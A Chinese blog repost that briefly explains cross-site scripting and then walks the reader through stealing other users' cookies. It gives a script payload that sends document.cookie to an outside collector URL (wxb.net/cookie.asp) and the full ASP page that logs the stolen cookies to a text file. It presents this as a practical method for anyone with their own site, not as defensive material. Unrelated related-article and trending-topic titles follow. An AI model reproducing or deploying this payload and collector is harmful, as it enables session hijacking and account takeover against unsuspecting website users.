XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。

XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。

方法/步骤

  1. 把客户的cookie信息收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是

    1 让目标访问已跨站的网址,然后这个网址执行脚本

  2. 2 然后跳转到你已经写好专门用来收集Cookie的网址 具体实现方法:先构造语句<script>window.open('http://wxb.net/cookie.asp?msg='+document.cookie)</script>这句话意思是打开一个新的窗口,访问http://wxb.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。

    这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:

    <html>

    <title>xx</title>

    <body>

    <%

    testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中

    msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值

    set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象

    set thisfile = fs.OpenTextFile(testfile,8,True,0)

    thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie

    thisfile.close   //关闭

    set fs = nothing

    %>

    </body>

    </html>

转载于:https://www.cnblogs.com/milantgh/p/3618292.html

XSS盗COOKIE相关推荐

  1. 盗COOKIE之方法总结

    1.xss跨站盗cookie 2.ajax跨域盗cookie 3.hosts文件映射 对于第一种方法,首先:在有跨站漏洞的页面贴上跨站代码如: <script>window.open('h ...

  2. 网络安全实验6 认识XSS 盗取cookie

    赞赏码 & 联系方式 & 个人闲话 [实验名称]认识XSS&盗取cookie [实验目的] 1. 了解XSS漏洞 2. 掌握盗取Cookie的方法 [实验原理] 1.什么是XS ...

  3. 通过钉钉网页上的js学习xss打cookie

    做完了一个项目,然后没啥事做,无意看到了一个钉钉的外部链接: 题外话1: 查看源码,复制其中的代码: try {var search = location.search;if (search & ...

  4. Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie

    靶场内容 本实验包含博客评论功能中的存储型 XSS漏洞.一个模拟的受害者用户在发布后查看所有评论.为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者. 注意 为了 ...

  5. XSS基础及实战(XSS提取cookie并登录的)

    该学新知识了! 本篇文章篇幅有点长,做了很多的本地攻击演示! 请耐心观看. 目录 XSS基础 XSS分类 反射型XSS的利用 演示一(基于DoraBOX靶场) 演示二(基于DVWA靶场) 等级为:im ...

  6. 简单xss接收cookie平台的搭建以及xss拿cookie的一些总结

    接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码 提取码: tdoj 我是将 ...

  7. 安全测试:xss,cookie,xst注入攻防

    2019独角兽企业重金招聘Python工程师标准>>> 查找并利用保存型XSS漏洞 确定保存型XSS漏洞的过程与前面描述的确定反射型XSS漏洞的过程有很多相似之处,都包括提交一个特殊 ...

  8. bWAPP中利用反射型xss获取cookie

    实验环境介绍 靶机:bWAPP bug类型:XSS - Reflected (GET) 难度级别:low 过程: 注:部分浏览器默认开启了XSS防御,关闭后才能实验成功. 测试靶机(图中的web se ...

  9. xss实战: 利用xss得到cookie /brscript src=https://www.yunssl.cn:9062/static/p2.js/script!-

    0. 前提:有一个你说了算的外网web服务器,比如找个免费的虚拟主机.如果只是内网搞搞xss就算了. 1. 制作一个get.js,放到web上,比如http://www.myweb.com/get.j ...

最新文章

  1. DNS基础及域名系统架构
  2. [学习笔记] Cordova+AmazeUI+React 做个通讯录 - 单页应用 (With Router)
  3. hdu 5542(树状数组优化dp)
  4. (2021年)IT技术分享社区个人文章汇总(数据库篇)
  5. 字符串2在字符串1中第一次出现的位置strstr()
  6. leetcode - 931. 下降路径最小和
  7. python字符串函数split_Python常见字符串操作函数小结【split()、join()、strip()】
  8. 记一次360面试总结(Android)
  9. 重要更新丨完成前端重构,KubeOperator开源容器平台v3.7.0发布
  10. word如何插入目录
  11. win10系统迁移后系统重装_Win10技巧:Windows 10系统迁移方法!
  12. 杨辉三角c语言实验收获体会,实验感想与心得体会简短
  13. 用iText把图片转成PDF
  14. 360进攻搜狗后院!研发输入法 搜狗称无压力
  15. log日志:打印日志到控制台、文件、日志文件分区、打印错误日志到文件
  16. 今年巴菲特的午餐上,躺着流血的地产商
  17. (栈帧和函数调用一)栈帧,函数调用与栈的关系
  18. 【AI人工智能】AI会对你的行业产生什么影响?
  19. 1.小象笔记--汇率换算
  20. 180512 tensorboard高维数据可视化

热门文章

  1. 网站优化关键词如何分类看好这四种!
  2. ajax调用上一个ajax,关于jquery:当频繁使用ajax请求调用函数时,如何在处理下一个请求之前等待上一个ajax请求完成?...
  3. 装箱算法 java_贪心算法装箱问题-Java代码
  4. linux pid t 头文件_Linux信号处理
  5. windows 编写的硬件驱动_哪个是PXI硬件合适的设备驱动程序?VISA还是IVI?
  6. Resources$NotFoundException Resource is not a Drawable (color or path) 问题解决
  7. 开发日记-20190916 gradle新的依赖方式implementation,api,compileOnly
  8. (转载)输出文件的指定行
  9. dns-sd._udp.domain. 域名发现 本质和MDNS同
  10. cassandra 存储list数组